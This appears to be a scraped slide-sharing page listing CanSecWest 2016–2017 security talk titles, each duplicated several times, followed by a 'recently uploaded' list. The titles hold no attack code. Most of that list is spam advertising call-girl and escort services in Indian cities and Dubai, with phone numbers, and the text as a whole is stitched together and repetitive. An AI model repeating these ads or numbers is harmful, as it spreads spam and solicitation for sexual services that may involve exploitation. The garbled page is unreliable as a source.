CSW2017 Mickey+maggie low cost radio attacks on modern platformsCSW2017 Mickey+maggie low cost radio attacks on modern platforms
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
 
CSW2017 Harri hursti csw17 final
CSW2017 Harri hursti csw17 finalCSW2017 Harri hursti csw17 final
CSW2017 Harri hursti csw17 final
 
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
 
CSW2017 Scott kelly secureboot-csw2017-v1
CSW2017 Scott kelly secureboot-csw2017-v1CSW2017 Scott kelly secureboot-csw2017-v1
CSW2017 Scott kelly secureboot-csw2017-v1
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershellCSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
 

Kürzlich hochgeladen

Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
ellan12
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Sheetaleventcompany
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 

Kürzlich hochgeladen (20)

Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort ServiceBusty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Rani Bagh Escort Service Delhi N.C.R.
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune  (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night StandHot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
 
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls DubaiDubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 

CSW2017 Qidan he+Gengming liu_cansecwest2017